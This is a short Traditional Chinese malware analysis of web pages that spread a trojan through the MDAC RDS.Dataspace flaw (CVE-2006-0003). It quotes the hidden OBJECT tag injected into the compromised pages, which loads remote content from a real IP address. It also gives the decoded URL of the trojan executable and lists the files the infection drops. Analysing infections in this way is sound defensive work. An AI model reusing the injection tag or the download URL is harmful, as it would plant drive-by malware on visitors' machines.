Microsoft Windows MDAC 漏洞 - CVE-2006-0003:
作? ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
洞的攻擊者可以完全控制受影響的系統。以下?使用此漏洞通過網頁散播木馬
--------------------------------------------------------------------------
2個網站的木馬來源均指向"中央大學遠距教學網"
比較特別的是將文件解碼後發現以下的語法:語法:Http://140.115.135.135/magic/_ken/4x6/COMET.Exe
木馬植入及相關行為:語法:<BODY scroll=yes> <OBJECT style="DISPLAY: none" type=text/x-scriptlet height=0 width=0 data=mk:@MSITStore:mhtml:c:\.mht! http://140.115.135.135/magic/_ken/4x6/hepl.txt::/%23%2E%68%74m></OBJECT></BODY> </html>
下載檔案及位置:
COMET.Exe
C:\Documents and Settings\user\Local Settings\Temporary Internet Files
之後更名轉存:
svchost.Exe
C:\Documents and Settings\user\Local Settings\Temp
自動執行後產生之檔案及位置:
C:\MP.EXE
C:\windows\loados.exe
C:\windows\mcsdos32.dll
造成 explorer.exe 程式錯誤。
造成 drwtsn32.exe 大量偵測及程式錯誤。
2者的錯誤造成幾乎當機的狀態。
其他:未知。
書籤